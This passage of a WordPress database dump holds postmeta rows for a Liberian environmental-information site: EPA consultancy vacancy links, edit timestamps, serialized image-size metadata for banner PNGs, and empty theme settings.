637,'closed_date','2022-02-28'),(32223,4637,'owner','EPA'),(32224,4637,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment.pdf'),(32225,4639,'_last_editor_used_jetpack','classic-editor'),(32226,4639,'_edit_lock','1650641379:42'),(32227,4639,'_edit_last','42'),(32228,4639,'_wp_page_template','default'),(32229,4639,'_wp_old_date','2022-04-22'),(32230,4639,'closed_date','2022-02-28'),(32231,4639,'owner','EPA'),(32232,4639,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf'),(32233,4642,'_last_editor_used_jetpack','classic-editor'),(32234,4642,'_edit_lock','1650644090:42'),(32235,4642,'_edit_last','42'),(32236,4642,'_wp_page_template','default'),(32237,4642,'_wp_old_date','2022-04-22'),(32238,4642,'closed_date','2022-03-02'),(32239,4642,'owner','EPA'),(32240,4642,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-to-air-jingles-and-Public-Service-Announcement.pdf'),(32241,4642,'_wp_old_date','2022-03-02'),(32242,4645,'_edit_lock','1651057390:42'),(32243,4645,'_last_editor_used_jetpack','block-editor'),(32244,4646,'_wp_attached_file','2022/04/giz-epa.png'),(32245,4646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2022/04/giz-epa.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"giz-epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"giz-epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"giz-epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"giz-epa-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"giz-epa-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"giz-epa-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:19:\"giz-epa-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:19:\"giz-epa-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:19:\"giz-epa-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:19:\"giz-epa-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:19:\"giz-epa-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32248,4645,'_wp_old_date','2022-04-27'),(32249,4645,'_thumbnail_id','4646'),(32250,4645,'_edit_last','42'),(32251,4645,'kava_extra_enable_breadcrumbs','inherit'),(32252,4645,'post_formats',''),(32253,4645,'gallery_tab',''),(32254,4645,'kava_extra_gallery_images',''),(32255,4645,'link_tab',''),(32256,4645,'kava_extra_link',''),(32257,4645,'kava_extra_link_target','_blank'),(32258,4645,'quote_tab',''),(32259,4645,'kava_extra_quote_text',''),(32260,4645,'kava_extra_quote_cite',''),(32261,4645,'audio_tab',''),(32262,4645,'kava_extra_audio',''),(32263,4645,'kava_extra_audio_loop','false'),(32264,4645,'kava_extra_audio_autoplay','false'),(32265,4645,'kava_extra_audio_preload','false'),(32266,4645,'video_tab',''),(32267,4645,'kava_extra_video_type','library'),(32268,4645,'kava_extra_video_library',''),(32269,4645,'kava_extra_video_external',''),(32270,4645,'kava_extra_video_poster',''),(32271,4645,'kava_extra_video_width','770'),(32272,4645,'kava_extra_video_height','480'),(32273,4645,'kava_extra_video_loop','false'),(32274,4645,'kava_extra_video_autoplay','false'),(32275,4645,'kava_extra_video_preload','false'),(32276,4648,'_edit_lock','1651057993:42'),(32277,4648,'_last_editor_used_jetpack','block-editor'),(32278,4649,'_wp_attached_file','2022/04/esia-training.png'),(32279,4649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2022/04/esia-training.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"esia-training-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"esia-training-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"esia-training-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"esia-training-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"esia-training-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"esia-training-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"esia-training-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"esia-training-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"esia-training-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:25:\"esia-training-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:25:\"esia-training-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32282,4648,'_wp_old_date','2022-04-27'),(32283,4648,'_thumbnail_id','4649'),(32284,4648,'_edit_last','42'),(32285,4648,'kava_extra_enable_breadcrumbs','inherit'),(32286,4648,'post_formats',''),(32287,4648,'gallery_tab',''),(32288,4648,'kava_extra_gallery_images',''),(32289,4648,'link_tab',''),(32290,4648,'kava_extra_link',''),(32291,4648,'kava_extra_link_target','_blank'),(32292,4648,'quote_tab',''),(32293,4648,'kava_extra_quote_text',''),(32294,4648,'kava_extra_quote_cite',''),(32295,4648,'audio_tab',''),(32296,4648,'kava_extra_audio',''),(32297,4648,'kava_extra_audio_loop','false'),(32298,4648,'kava_extra_audio_autoplay','false'),(32299,4648,'kava_extra_audio_preload','false'),(32300,4648,'video_tab',''),(32301,4648,'kava_extra_video_type','library'),(32302,4648,'kava_extra_video_library',''),(32303,4648,'kava_extra_video_external',''),(32304,4648,'kava_extra_video_poster',''),(32305,4648,'kava_extra_video_width','770'),(32306,4648,'kava_extra_video_height','480'),(32307,4648,'kava_extra_video_loop','false'),(32308,4648,'kava_extra_video_autoplay','false'),(32309,4648,'kava_extra_video_preload','false'),(32310,4651,'_edit_lock','1651058327:42'),(32311,4651,'_last_editor_used_jetpack','block-editor'),(32312,4652,'_wp_attached_file','2022/04/ESIA-training-2.png'),(32313,4652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2022/04/ESIA-training-2.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"ESIA-training-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:27:\"ESIA-training-2-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32316,4651,'_wp_old_date','2022-04-27'),(32317,4651,'_thumbnail_id','4652'),(32318,4651,'_edit_last','42'),(32319,4651,'kava_extra_enable_breadcrumbs','inherit'),(32320,4651,'post_formats',''),(32321,4651,'gallery_tab',''),(32322,4651,'kava_extra_gallery_images',''),(32323,4651,'link_tab',''),(32324,4651,'kava_extra_link',''),(32325,4651,'kava_extra_link_target','_blank'),(32326,4651,'quote_tab',''),(32327,4651,'kava_extra_quote_text',''),(32328,4651,'kava_extra_quote_cite',''),(32329,4651,'audio_tab',''),(32330,4651,'kava_extra_audio',''),(32331,4651,'kava_extra_audio_loop','false'),(32332,4651,'kava_extra_audio_autoplay','false'),(32333,4651,'kava_extra_audio_preload','false'),(32334,4651,'video_tab',''),(32335,4651,'kava_extra_video_type','library'),(32336,4651,'kava_extra_video_library',''),(32337,4651,'kava_extra_video_external',''),(32338,4651,'kava_extra_video_poster',''),(32339,4651,'kava_extra_video_width','770'),(32340,4651,'kava_extra_video_height','480'),(32341,4651,'kava_extra_video_loop','false'),(32342,4651,'kava_extra_video_autoplay','false'),(32343,4651,'kava_extra_video_preload','false'),(32344,4654,'_edit_lock','1651058778:42'),(32345,4654,'_last_editor_used_jetpack','block-editor'),(32346,4655,'_wp_attached_file','2022/04/ED.png'),(32347,4655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2022/04/ED.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"ED-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"ED-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"ED-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"ED-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:13:\"ED-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:14:\"ED-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:14:\"ED-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:14:\"ED-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:14:\"ED-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:14:\"ED-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:14:\"ED-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32350,4654,'_wp_old_date','2022-04-27'),(32351,4654,'_thumbnail_id','4655'),(32352,4654,'_edit_last','42'),(32353,4654,'kava_extra_enable_breadcrumbs','inherit'),(32354,4654,'post_formats',''),(32355,4654,'gallery_tab',''),(32356,4654,'kava_extra_gallery_images',''),(32357,4654,'link_tab',''),(32358,4654,'kava_extra_link',''),(32359,4654,'kava_extra_link_target','_blank'),(32360,4654,'quote_tab',''),(32361,4654,'kava_extra_quote_text',''),(32362,4654,'kava_extra_quote_cite',''),(32363,4654,'audio_tab',''),(32364,4654,'kava_extra_audio',''),(32365,4654,'kava_extra_audio_loop','false'),(32366,4654,'kava_extra_audio_autoplay','false'),(32367,4654,'kava_extra_audio_preload','false'),(32368,4654,'video_tab',''),(32369,4654,'kava_extra_video_type','library'),(32370,4654,'kava_extra_video_library',''),(32371,4654,'kava_extra_video_external',''),(32372,4654,'kava_extra_video_poster',''),(32373,4654,'kava_extra_video_width','770'),(32374,4654,'kava_extra_video_height','480'),(32375,4654,'kava_extra_video_loop','false'),(32376,4654,'kava_extra_video_autoplay','false'),(32377,4654,'kava_extra_video_preload','false'),(32378,4657,'_edit_lock','1651059239:42'),(32379,4657,'_last_editor_used_jetpack','block-editor'),(32380,4658,'_wp_attached_file','2022/04/ndma-training.png'),(32381,4658,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2022/04/ndma-training.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"ndma-training-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"ndma-training-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"ndma-training-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"ndma-training-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"ndma-training-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"ndma-training-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"ndma-training-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"ndma-training-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"ndma-training-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:25:\"ndma-training-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:25:\"ndma-training-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32384,4657,'_wp_old_date','2022-04-27'),(32385,4657,'_thumbnail_id','4658'),(32386,4657,'_edit_last','42'),(32387,4657,'kava_extra_enable_breadcrumbs','inherit'),(32388,4657,'post_formats',''),(32389,4657,'gallery_tab',''),(32390,4657,'kava_extra_gallery_images',''),(32391,4657,'link_tab',''),(32392,4657,'kava_extra_link',''),(32393,4657,'kava_extra_link_target','_blank'),(32394,4657,'quote_tab',''),(32395,4657,'kava_extra_quote_text',''),(32396,4657,'kava_extra_quote_cite',''),(32397,4657,'audio_tab',''),(32398,4657,'kava_extra_audio',''),(32399,4657,'kava_extra_audio_loop','false'),(32400,4657,'kava_extra_audio_autoplay','false'),(32401,4657,'kava_extra_audio_preload','false'),(32402,4657,'video_tab',''),(32403,4657,'kava_extra_video_type','library'),(32404,4657,'kava_extra_video_library',''),(32405,4657,'kava_extra_video_external',''),(32406,4657,'kava_extra_video_poster',''),(32407,4657,'kava_extra_video_width','770'),(32408,4657,'kava_extra_video_height','480'),(32409,4657,'kava_extra_video_loop','false'),(32410,4657,'kava_extra_video_autoplay','false'),(32411,4657,'kava_extra_video_preload','false'),(32412,4660,'_edit_lock','1652095020:42'),(32413,4660,'_last_editor_used_jetpack','block-editor'),(32414,4661,'_wp_attached_file','2022/04/gol.png'),(32415,4661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/04/gol.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"gol-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"gol-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"gol-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"gol-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"gol-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"gol-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"gol-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"gol-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"gol-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"gol-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"gol-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32418,4660,'_wp_old_date','2022-04-27'),(32419,4660,'_thumbnail_id','4661'),(32420,4660,'_edit_last','42'),(32421,4660,'kava_extra_enable_breadcrumbs','inherit'),(32422,4660,'post_formats',''),(32423,4660,'gallery_tab',''),(32424,4660,'kava_extra_gallery_images',''),(32425,4660,'link_tab',''),(32426,4660,'kava_extra_link',''),(32427,4660,'kava_extra_link_target','_blank'),(32428,4660,'quote_tab',''),(32429,4660,'kava_extra_quote_text',''),(32430,4660,'kava_extra_quote_cite',''),(32431,4660,'audio_tab',''),(32432,4660,'kava_extra_audio',''),(32433,4660,'kava_extra_audio_loop','false'),(32434,4660,'kava_extra_audio_autoplay','false'),(32435,4660,'kava_extra_audio_preload','false'),(32436,4660,'video_tab',''),(32437,4660,'kava_extra_video_type','library'),(32438,4660,'kava_extra_video_library',''),(32439,4660,'kava_extra_video_external',''),(32440,4660,'kava_extra_video_poster',''),(32441,4660,'kava_extra_video_width','770'),(32442,4660,'kava_extra_video_height','480'),(32443,4660,'kava_extra_video_loop','false'),(32444,4660,'kava_extra_video_autoplay','false'),(32445,4660,'kava_extra_video_preload','false'),(32446,4663,'_edit_lock','1651065002:42'),(32447,4663,'_last_editor_used_jetpack','block-editor'),(32448,4664,'_wp_attached_file','2022/04/epa-giz.png'),(32449,4664,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2022/04/epa-giz.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"epa-giz-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"epa-giz-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"epa-giz-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"epa-giz-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"epa-giz-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"epa-giz-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:19:\"epa-giz-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:19:\"epa-giz-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:19:\"epa-giz-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:19:\"epa-giz-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:19:\"epa-giz-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32452,4663,'_wp_old_date','2022-04-27'),(32453,4663,'_thumbnail_id','4664'),(32454,4663,'_edit_last','42'),(32455,4663,'kava_extra_enable_breadcrumbs','inherit'),(32456,4663,'post_formats',''),(32457,4663,'gallery_tab',''),(32458,4663,'kava_extra_gallery_images',''),(32459,4663,'link_tab',''),(32460,4663,'kava_extra_link',''),(32461,4663,'kava_extra_link_target','_blank'),(32462,4663,'quote_tab',''),(32463,4663,'kava_extra_quote_text',''),(32464,4663,'kava_extra_quote_cite',''),(32465,4663,'audio_tab',''),(32466,4663,'kava_extra_audio',''),(32467,4663,'kava_extra_audio_loop','false'),(32468,4663